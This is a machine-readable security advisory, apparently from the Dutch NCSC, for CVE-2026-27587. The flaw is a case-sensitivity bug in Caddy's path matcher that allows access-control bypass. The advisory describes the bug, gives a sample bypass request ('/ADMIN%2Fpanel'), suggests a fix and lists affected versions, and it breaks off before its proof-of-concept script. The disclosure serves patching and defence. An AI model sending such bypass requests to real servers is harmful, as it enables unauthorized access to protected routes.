{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-27587", "tracking": { "current_release_date": "2026-03-26T18:49:05.162884Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-27587", "initial_release_date": "2026-02-24T17:52:43.002277Z", "revision_history": [ { "date": "2026-02-24T17:52:43.002277Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-02-24T17:52:47.242300Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-02-24T18:26:25.987107Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-02-24T18:26:29.805933Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-02-24T20:39:52.337361Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)." }, { "date": "2026-02-24T20:40:05.049072Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-02-25T00:12:55.602505Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (4).| CWES updated (1)." }, { "date": "2026-02-25T00:20:18.976942Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (94).| References created (4).| CWES updated (1)." }, { "date": "2026-02-25T00:42:40.763119Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Products connected (1)." }, { "date": "2026-02-25T00:42:42.287978Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-02-25T06:42:54.741833Z", "number": "11", "summary": "Description created for source." }, { "date": "2026-02-25T15:13:52.341762Z", "number": "12", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-02-25T15:13:53.809239Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-02-25T17:27:57.503558Z", "number": "14", "summary": "CVSS created.| Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-02-25T17:28:08.902909Z", "number": "15", "summary": "NCSC Score updated." }, { "date": "2026-02-27T00:12:56.780587Z", "number": "16", "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (3)." }, { "date": "2026-02-27T00:12:58.321932Z", "number": "17", "summary": "NCSC Score updated." }, { "date": "2026-02-27T12:10:43.082641Z", "number": "18", "summary": "Products created (4)." }, { "date": "2026-02-27T12:10:57.476752Z", "number": "19", "summary": "NCSC Score updated." }, { "date": "2026-02-27T20:39:35.307448Z", "number": "20", "summary": "References created (1)." }, { "date": "2026-02-27T20:39:40.688594Z", "number": "21", "summary": "NCSC Score updated." }, { "date": "2026-02-27T21:39:05.047250Z", "number": "22", "summary": "Unknown change." }, { "date": "2026-02-28T06:12:56.062762Z", "number": "23", "summary": "References created (1)." }, { "date": "2026-03-20T09:40:38.827241Z", "number": "24", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T09:40:42.169416Z", "number": "25", "summary": "NCSC Score updated." }, { "date": "2026-03-26T02:10:26.837216Z", "number": "26", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (12).| Product Identifiers created (10).| References created (4)." }, { "date": "2026-03-26T02:10:32.170817Z", "number": "27", "summary": "NCSC Score updated." }, { "date": "2026-03-26T18:47:56.321102Z", "number": "28", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| References created (7).| CWES updated (1)." }, { "date": "2026-03-26T18:47:58.798044Z", "number": "29", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (6).| CWES updated (1)." }, { "date": "2026-03-26T18:48:01.948359Z", "number": "30", "summary": "NCSC Score updated." } ], "status": "interim", "version": "30" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<2.11.1", "product": { "name": "vers:unknown/<2.11.1", "product_id": "CSAFPID-5688699", "product_identification_helper": { "cpe": "cpe:2.3:a:caddyserver:caddy:*:*:*:*:*:*:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<2.11.1", "product": { "name": "vers:unknown/>=0|<2.11.1", "product_id": "CSAFPID-5700114" } }, { "category": "product_version_range", "name": "vers:unknown/>=2.10.2|<2.11.1", "product": { "name": "vers:unknown/>=2.10.2|<2.11.1", "product_id": "CSAFPID-5706479", "product_identification_helper": { "cpe": "cpe:2.3:a:caddyserver:caddy:*:*:*:*:*:*:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0", "product": { "name": "vers:unknown/v2.0.0", "product_id": "CSAFPID-4034332" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta.13", "product": { "name": "vers:unknown/v2.0.0-beta.13", "product_id": "CSAFPID-4034342" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta.14", "product": { "name": "vers:unknown/v2.0.0-beta.14", "product_id": "CSAFPID-4034343" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta.15", "product": { "name": "vers:unknown/v2.0.0-beta.15", "product_id": "CSAFPID-4034344" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta.16", "product": { "name": "vers:unknown/v2.0.0-beta.16", "product_id": "CSAFPID-4034345" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta.17", "product": { "name": "vers:unknown/v2.0.0-beta.17", "product_id": "CSAFPID-4034346" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta.18", "product": { "name": "vers:unknown/v2.0.0-beta.18", "product_id": "CSAFPID-4034347" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta.19", "product": { "name": "vers:unknown/v2.0.0-beta.19", "product_id": "CSAFPID-4034348" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta.20", "product": { "name": "vers:unknown/v2.0.0-beta.20", "product_id": "CSAFPID-4034349" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta1", "product": { "name": "vers:unknown/v2.0.0-beta1", "product_id": "CSAFPID-4034350" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta10", "product": { "name": "vers:unknown/v2.0.0-beta10", "product_id": "CSAFPID-4034351" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta11", "product": { "name": "vers:unknown/v2.0.0-beta11", "product_id": "CSAFPID-4034352" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta12", "product": { "name": "vers:unknown/v2.0.0-beta12", "product_id": "CSAFPID-4034353" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta2", "product": { "name": "vers:unknown/v2.0.0-beta2", "product_id": "CSAFPID-4034354" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta3", "product": { "name": "vers:unknown/v2.0.0-beta3", "product_id": "CSAFPID-4034355" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta4", "product": { "name": "vers:unknown/v2.0.0-beta4", "product_id": "CSAFPID-4034356" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta5", "product": { "name": "vers:unknown/v2.0.0-beta5", "product_id": "CSAFPID-4034357" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta6", "product": { "name": "vers:unknown/v2.0.0-beta6", "product_id": "CSAFPID-4034358" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta7", "product": { "name": "vers:unknown/v2.0.0-beta7", "product_id": "CSAFPID-4034359" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta8", "product": { "name": "vers:unknown/v2.0.0-beta8", "product_id": "CSAFPID-4034360" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-beta9", "product": { "name": "vers:unknown/v2.0.0-beta9", "product_id": "CSAFPID-4034361" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-rc.1", "product": { "name": "vers:unknown/v2.0.0-rc.1", "product_id": "CSAFPID-4034362" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-rc.2", "product": { "name": "vers:unknown/v2.0.0-rc.2", "product_id": "CSAFPID-4034363" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0-rc.3", "product": { "name": "vers:unknown/v2.0.0-rc.3", "product_id": "CSAFPID-4034364" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.0", "product": { "name": "vers:unknown/v2.1.0", "product_id": "CSAFPID-4034378" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.0-beta.1", "product": { "name": "vers:unknown/v2.1.0-beta.1", "product_id": "CSAFPID-4034379" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.0-beta.2", "product": { "name": "vers:unknown/v2.1.0-beta.2", "product_id": "CSAFPID-4034380" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.1", "product": { "name": "vers:unknown/v2.1.1", "product_id": "CSAFPID-4034387" } }, { "category": "product_version_range", "name": "vers:unknown/v2.10.0", "product": { "name": "vers:unknown/v2.10.0", "product_id": "CSAFPID-5700154" } }, { "category": "product_version_range", "name": "vers:unknown/v2.10.0-beta.1", "product": { "name": "vers:unknown/v2.10.0-beta.1", "product_id": "CSAFPID-5700155" } }, { "category": "product_version_range", "name": "vers:unknown/v2.10.0-beta.2", "product": { "name": "vers:unknown/v2.10.0-beta.2", "product_id": "CSAFPID-5700156" } }, { "category": "product_version_range", "name": "vers:unknown/v2.10.0-beta.3", "product": { "name": "vers:unknown/v2.10.0-beta.3", "product_id": "CSAFPID-5700157" } }, { "category": "product_version_range", "name": "vers:unknown/v2.10.0-beta.4", "product": { "name": "vers:unknown/v2.10.0-beta.4", "product_id": "CSAFPID-5700158" } }, { "category": "product_version_range", "name": "vers:unknown/v2.10.1", "product": { "name": "vers:unknown/v2.10.1", "product_id": "CSAFPID-5700159" } }, { "category": "product_version_range", "name": "vers:unknown/v2.10.2", "product": { "name": "vers:unknown/v2.10.2", "product_id": "CSAFPID-5700160" } }, { "category": "product_version_range", "name": "vers:unknown/v2.11.0", "product": { "name": "vers:unknown/v2.11.0", "product_id": "CSAFPID-5700161" } }, { "category": "product_version_range", "name": "vers:unknown/v2.11.0-beta.1", "product": { "name": "vers:unknown/v2.11.0-beta.1", "product_id": "CSAFPID-5700162" } }, { "category": "product_version_range", "name": "vers:unknown/v2.11.0-beta.2", "product": { "name": "vers:unknown/v2.11.0-beta.2", "product_id": "CSAFPID-5700163" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.0", "product": { "name": "vers:unknown/v2.2.0", "product_id": "CSAFPID-4034396" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.0-rc.1", "product": { "name": "vers:unknown/v2.2.0-rc.1", "product_id": "CSAFPID-4034400" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.0-rc.2", "product": { "name": "vers:unknown/v2.2.0-rc.2", "product_id": "CSAFPID-4034401" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.0-rc.3", "product": { "name": "vers:unknown/v2.2.0-rc.3", "product_id": "CSAFPID-4034402" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.1", "product": { "name": "vers:unknown/v2.2.1", "product_id": "CSAFPID-4034407" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.3", "product": { "name": "vers:unknown/v2.2.3", "product_id": "CSAFPID-4034411" } }, { "category": "product_version_range", "name": "vers:unknown/v2.3.0", "product": { "name": "vers:unknown/v2.3.0", "product_id": "CSAFPID-4034417" } }, { "category": "product_version_range", "name": "vers:unknown/v2.3.0-beta.1", "product": { "name": "vers:unknown/v2.3.0-beta.1", "product_id": "CSAFPID-4034418" } }, { "category": "product_version_range", "name": "vers:unknown/v2.3.0-rc.1", "product": { "name": "vers:unknown/v2.3.0-rc.1", "product_id": "CSAFPID-4034419" } }, { "category": "product_version_range", "name": "vers:unknown/v2.3.0-rc.2", "product": { "name": "vers:unknown/v2.3.0-rc.2", "product_id": "CSAFPID-4034420" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.0", "product": { "name": "vers:unknown/v2.4.0", "product_id": "CSAFPID-4034435" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.0-beta.1", "product": { "name": "vers:unknown/v2.4.0-beta.1", "product_id": "CSAFPID-4034436" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.0-beta.2", "product": { "name": "vers:unknown/v2.4.0-beta.2", "product_id": "CSAFPID-4034437" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.0-rc.1", "product": { "name": "vers:unknown/v2.4.0-rc.1", "product_id": "CSAFPID-4034438" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.1", "product": { "name": "vers:unknown/v2.4.1", "product_id": "CSAFPID-4034441" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.2", "product": { "name": "vers:unknown/v2.4.2", "product_id": "CSAFPID-4034447" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.3", "product": { "name": "vers:unknown/v2.4.3", "product_id": "CSAFPID-4034448" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.4", "product": { "name": "vers:unknown/v2.4.4", "product_id": "CSAFPID-4034449" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.5", "product": { "name": "vers:unknown/v2.4.5", "product_id": "CSAFPID-4034450" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.6", "product": { "name": "vers:unknown/v2.4.6", "product_id": "CSAFPID-4034451" } }, { "category": "product_version_range", "name": "vers:unknown/v2.5.0", "product": { "name": "vers:unknown/v2.5.0", "product_id": "CSAFPID-4034455" } }, { "category": "product_version_range", "name": "vers:unknown/v2.5.0-beta.1", "product": { "name": "vers:unknown/v2.5.0-beta.1", "product_id": "CSAFPID-4034456" } }, { "category": "product_version_range", "name": "vers:unknown/v2.5.0-rc.1", "product": { "name": "vers:unknown/v2.5.0-rc.1", "product_id": "CSAFPID-4034457" } }, { "category": "product_version_range", "name": "vers:unknown/v2.5.1", "product": { "name": "vers:unknown/v2.5.1", "product_id": "CSAFPID-4034464" } }, { "category": "product_version_range", "name": "vers:unknown/v2.5.2", "product": { "name": "vers:unknown/v2.5.2", "product_id": "CSAFPID-4034465" } }, { "category": "product_version_range", "name": "vers:unknown/v2.6.0", "product": { "name": "vers:unknown/v2.6.0", "product_id": "CSAFPID-4034466" } }, { "category": "product_version_range", "name": "vers:unknown/v2.6.0-beta.1", "product": { "name": "vers:unknown/v2.6.0-beta.1", "product_id": "CSAFPID-4034467" } }, { "category": "product_version_range", "name": "vers:unknown/v2.6.0-beta.2", "product": { "name": "vers:unknown/v2.6.0-beta.2", "product_id": "CSAFPID-4034468" } }, { "category": "product_version_range", "name": "vers:unknown/v2.6.0-beta.3", "product": { "name": "vers:unknown/v2.6.0-beta.3", "product_id": "CSAFPID-4034469" } }, { "category": "product_version_range", "name": "vers:unknown/v2.6.0-beta.4", "product": { "name": "vers:unknown/v2.6.0-beta.4", "product_id": "CSAFPID-4034470" } }, { "category": "product_version_range", "name": "vers:unknown/v2.6.0-beta.5", "product": { "name": "vers:unknown/v2.6.0-beta.5", "product_id": "CSAFPID-4034471" } }, { "category": "product_version_range", "name": "vers:unknown/v2.6.1", "product": { "name": "vers:unknown/v2.6.1", "product_id": "CSAFPID-4034472" } }, { "category": "product_version_range", "name": "vers:unknown/v2.6.2", "product": { "name": "vers:unknown/v2.6.2", "product_id": "CSAFPID-4034473" } }, { "category": "product_version_range", "name": "vers:unknown/v2.6.3", "product": { "name": "vers:unknown/v2.6.3", "product_id": "CSAFPID-4034474" } }, { "category": "product_version_range", "name": "vers:unknown/v2.6.4", "product": { "name": "vers:unknown/v2.6.4", "product_id": "CSAFPID-4034475" } }, { "category": "product_version_range", "name": "vers:unknown/v2.7.0", "product": { "name": "vers:unknown/v2.7.0", "product_id": "CSAFPID-4034476" } }, { "category": "product_version_range", "name": "vers:unknown/v2.7.0-beta.1", "product": { "name": "vers:unknown/v2.7.0-beta.1", "product_id": "CSAFPID-4034477" } }, { "category": "product_version_range", "name": "vers:unknown/v2.7.0-beta.2", "product": { "name": "vers:unknown/v2.7.0-beta.2", "product_id": "CSAFPID-4034478" } }, { "category": "product_version_range", "name": "vers:unknown/v2.7.1", "product": { "name": "vers:unknown/v2.7.1", "product_id": "CSAFPID-4034479" } }, { "category": "product_version_range", "name": "vers:unknown/v2.7.2", "product": { "name": "vers:unknown/v2.7.2", "product_id": "CSAFPID-4034480" } }, { "category": "product_version_range", "name": "vers:unknown/v2.7.3", "product": { "name": "vers:unknown/v2.7.3", "product_id": "CSAFPID-4034481" } }, { "category": "product_version_range", "name": "vers:unknown/v2.7.4", "product": { "name": "vers:unknown/v2.7.4", "product_id": "CSAFPID-4034482" } }, { "category": "product_version_range", "name": "vers:unknown/v2.7.5", "product": { "name": "vers:unknown/v2.7.5", "product_id": "CSAFPID-5700164" } }, { "category": "product_version_range", "name": "vers:unknown/v2.8.0", "product": { "name": "vers:unknown/v2.8.0", "product_id": "CSAFPID-5700165" } }, { "category": "product_version_range", "name": "vers:unknown/v2.8.0-beta.1", "product": { "name": "vers:unknown/v2.8.0-beta.1", "product_id": "CSAFPID-5700166" } }, { "category": "product_version_range", "name": "vers:unknown/v2.8.0-beta.2", "product": { "name": "vers:unknown/v2.8.0-beta.2", "product_id": "CSAFPID-5700167" } }, { "category": "product_version_range", "name": "vers:unknown/v2.8.0-rc.1", "product": { "name": "vers:unknown/v2.8.0-rc.1", "product_id": "CSAFPID-5700168" } }, { "category": "product_version_range", "name": "vers:unknown/v2.8.1", "product": { "name": "vers:unknown/v2.8.1", "product_id": "CSAFPID-5700169" } }, { "category": "product_version_range", "name": "vers:unknown/v2.8.2", "product": { "name": "vers:unknown/v2.8.2", "product_id": "CSAFPID-5700170" } }, { "category": "product_version_range", "name": "vers:unknown/v2.8.3", "product": { "name": "vers:unknown/v2.8.3", "product_id": "CSAFPID-5700171" } }, { "category": "product_version_range", "name": "vers:unknown/v2.8.4", "product": { "name": "vers:unknown/v2.8.4", "product_id": "CSAFPID-5700172" } }, { "category": "product_version_range", "name": "vers:unknown/v2.9.0", "product": { "name": "vers:unknown/v2.9.0", "product_id": "CSAFPID-5700173" } }, { "category": "product_version_range", "name": "vers:unknown/v2.9.0-beta.1", "product": { "name": "vers:unknown/v2.9.0-beta.1", "product_id": "CSAFPID-5700174" } }, { "category": "product_version_range", "name": "vers:unknown/v2.9.0-beta.2", "product": { "name": "vers:unknown/v2.9.0-beta.2", "product_id": "CSAFPID-5700175" } }, { "category": "product_version_range", "name": "vers:unknown/v2.9.0-beta.3", "product": { "name": "vers:unknown/v2.9.0-beta.3", "product_id": "CSAFPID-5700176" } }, { "category": "product_version_range", "name": "vers:unknown/v2.9.1", "product": { "name": "vers:unknown/v2.9.1", "product_id": "CSAFPID-5700177" } } ], "category": "product_name", "name": "Caddy" } ], "category": "vendor", "name": "Caddyserver" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-5700549" } } ], "category": "product_name", "name": "caddy" } ], "category": "product_family", "name": "bookworm" } ], "category": "vendor", "name": "Debian" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/2.6.2-11", "product": { "name": "vers:unknown/2.6.2-11", "product_id": "CSAFPID-5913758", "product_identification_helper": { "purl": "pkg:deb/ubuntu/caddy@2.6.2-11?arch=source&distro=questing" } } }, { "category": "product_version_range", "name": "vers:unknown/2.6.2-12", "product": { "name": "vers:unknown/2.6.2-12", "product_id": "CSAFPID-5913759", "product_identification_helper": { "purl": "pkg:deb/ubuntu/caddy@2.6.2-12?arch=source&distro=questing" } } }, { "category": "product_version_range", "name": "vers:unknown/2.6.2-9", "product": { "name": "vers:unknown/2.6.2-9", "product_id": "CSAFPID-5913757", "product_identification_helper": { "purl": "pkg:deb/ubuntu/caddy@2.6.2-9?arch=source&distro=questing" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0", "product": { "name": "vers:unknown/>=0", "product_id": "CSAFPID-5913760" } } ], "category": "product_name", "name": "caddy" } ], "category": "product_family", "name": "Ubuntu:25.10" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/2.6.2-6", "product": { "name": "vers:unknown/2.6.2-6", "product_id": "CSAFPID-5913749", "product_identification_helper": { "purl": "pkg:deb/ubuntu/caddy@2.6.2-6?arch=source&distro=esm-apps/noble" } } }, { "category": "product_version_range", "name": "vers:unknown/2.6.2-6ubuntu0.24.04.1", "product": { "name": "vers:unknown/2.6.2-6ubuntu0.24.04.1", "product_id": "CSAFPID-5913750", "product_identification_helper": { "purl": "pkg:deb/ubuntu/caddy@2.6.2-6ubuntu0.24.04.1?arch=source&distro=esm-apps/noble" } } }, { "category": "product_version_range", "name": "vers:unknown/2.6.2-6ubuntu0.24.04.2", "product": { "name": "vers:unknown/2.6.2-6ubuntu0.24.04.2", "product_id": "CSAFPID-5913751", "product_identification_helper": { "purl": "pkg:deb/ubuntu/caddy@2.6.2-6ubuntu0.24.04.2?arch=source&distro=esm-apps/noble" } } }, { "category": "product_version_range", "name": "vers:unknown/2.6.2-6ubuntu0.24.04.2+esm1", "product": { "name": "vers:unknown/2.6.2-6ubuntu0.24.04.2+esm1", "product_id": "CSAFPID-5913752", "product_identification_helper": { "purl": "pkg:deb/ubuntu/caddy@2.6.2-6ubuntu0.24.04.2%2Besm1?arch=source&distro=esm-apps/noble" } } }, { "category": "product_version_range", "name": "vers:unknown/2.6.2-6ubuntu0.24.04.3", "product": { "name": "vers:unknown/2.6.2-6ubuntu0.24.04.3", "product_id": "CSAFPID-5913753", "product_identification_helper": { "purl": "pkg:deb/ubuntu/caddy@2.6.2-6ubuntu0.24.04.3?arch=source&distro=esm-apps/noble" } } }, { "category": "product_version_range", "name": "vers:unknown/2.6.2-6ubuntu0.24.04.3+esm1", "product": { "name": "vers:unknown/2.6.2-6ubuntu0.24.04.3+esm1", "product_id": "CSAFPID-5913754", "product_identification_helper": { "purl": "pkg:deb/ubuntu/caddy@2.6.2-6ubuntu0.24.04.3%2Besm1?arch=source&distro=esm-apps/noble" } } }, { "category": "product_version_range", "name": "vers:unknown/2.6.2-6ubuntu0.24.04.3+esm2", "product": { "name": "vers:unknown/2.6.2-6ubuntu0.24.04.3+esm2", "product_id": "CSAFPID-5913755", "product_identification_helper": { "purl": "pkg:deb/ubuntu/caddy@2.6.2-6ubuntu0.24.04.3%2Besm2?arch=source&distro=esm-apps/noble" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0", "product": { "name": "vers:unknown/>=0", "product_id": "CSAFPID-5913756" } } ], "category": "product_name", "name": "caddy" } ], "category": "product_family", "name": "Ubuntu:Pro:24.04:LTS" } ], "category": "vendor", "name": "Ubuntu" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/v2.10.2", "product": { "name": "vers:unknown/v2.10.2", "product_id": "CSAFPID-5735034" } }, { "category": "product_version_range", "name": "vers:unknown/v2.11.0", "product": { "name": "vers:unknown/v2.11.0", "product_id": "CSAFPID-5735035" } }, { "category": "product_version_range", "name": "vers:unknown/v2.11.0-beta.1", "product": { "name": "vers:unknown/v2.11.0-beta.1", "product_id": "CSAFPID-5735036" } }, { "category": "product_version_range", "name": "vers:unknown/v2.11.0-beta.2", "product": { "name": "vers:unknown/v2.11.0-beta.2", "product_id": "CSAFPID-5735037" } } ], "category": "product_name", "name": "caddy" } ], "category": "vendor", "name": "mholt" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/2.11.1", "product": { "name": "vers:unknown/2.11.1", "product_id": "CSAFPID-5918973" } }, { "category": "product_version_range", "name": "vers:unknown/<2.11.1", "product": { "name": "vers:unknown/<2.11.1", "product_id": "CSAFPID-5918974" } } ], "category": "product_name", "name": "go/github.com/caddyserver/caddy/v2" } ], "category": "vendor", "name": "caddy" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/2.11.1", "product": { "name": "vers:unknown/2.11.1", "product_id": "CSAFPID-5918975" } }, { "category": "product_version_range", "name": "vers:unknown/<2.11.1", "product": { "name": "vers:unknown/<2.11.1", "product_id": "CSAFPID-5918976" } } ], "category": "product_name", "name": "go/github.com/caddyserver/caddy/v2/modules/caddyhttp" } ], "category": "vendor", "name": "modules" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-27587", "cwe": { "id": "CWE-178", "name": "Improper Handling of Case Sensitivity" }, "notes": [ { "category": "description", "text": "Caddy is an extensible server platform that uses TLS by default. Prior to version 2.11.1, Caddy's HTTP `path` request matcher is intended to be case-insensitive, but when the match pattern contains percent-escape sequences (`%xx`) it compares against the request's escaped path without lowercasing. An attacker can bypass path-based routing and any access controls attached to that route by changing the casing of the request path. Version 2.11.1 contains a fix for the issue.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27587" }, { "category": "description", "text": "Caddy is an extensible server platform that uses TLS by default. Prior to version 2.11.1, Caddy's HTTP `path` request matcher is intended to be case-insensitive, but when the match pattern contains percent-escape sequences (`%xx`) it compares against the request's escaped path without lowercasing. An attacker can bypass path-based routing and any access controls attached to that route by changing the casing of the request path. Version 2.11.1 contains a fix for the issue.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27587" }, { "category": "description", "text": "### Summary\nCaddy's HTTP `path` request matcher is intended to be case-insensitive, but when the match pattern contains percent-escape sequences (`%xx`) it compares against the request's escaped path without lowercasing. An attacker can bypass path-based routing and any access controls attached to that route by changing the casing of the request path.\n\n### Details\nIn Caddy `v2.10.2`, `MatchPath` is explicitly designed to be case-insensitive and lowercases match patterns during provisioning:\n\n- `modules/caddyhttp/matchers.go`: rationale captured in the `MatchPath` comment.\n- `MatchPath.Provision` lowercases configured patterns via `strings.ToLower`.\n- `MatchPath.MatchWithError` lowercases the request path for the normal matching path: `reqPath := strings.ToLower(r.URL.Path)`.\n\nBut when a match pattern contains a percent sign (`%`), `MatchPath.MatchWithError` switches to \"escaped space\" matching and builds the comparison string from `r.URL.EscapedPath()`:\n\n- `reqPathForPattern := CleanPath(r.URL.EscapedPath(), mergeSlashes)`\n- If it doesn't match, it `continue`s (skipping the remaining matching logic for that pattern).\n\nBecause `r.URL.EscapedPath()` is not lowercased, case differences in the request path can cause the escaped-space match to fail even though `MatchPath` is meant to be case-insensitive. For example, with a pattern of `/admin%2Fpanel`:\n\n- Requesting `/admin%2Fpanel` matches and can be denied as intended.\n- Requesting `/ADMIN%2Fpanel` does not match and falls through to other routes/handlers.\n\n#### Suggested fix\n- In the `%`-pattern matching path, ensure the effective string passed to `path.Match` is lowercased (same as the normal branch).\n - Simplest seems to lowercase the constructed string in `matchPatternWithEscapeSequence` right before `path.Match`.\n\nReproduced on:\n- Stable release: `v2.10.2` -- this is the release referenced in the reproduction below.\n- Dev build: `v2.11.0-beta.2`.\n- Master tip: commit `58968b3fd38cacbf4b5e07cc8c8be27696dce60f`.\n\n### PoC\nPrereqs:\n- bash, curl\n- A pre-built Caddy binary available at `/opt/caddy-2.10.2/caddy` (edit `CADDY_BIN` in the script if needed)\n\n\n
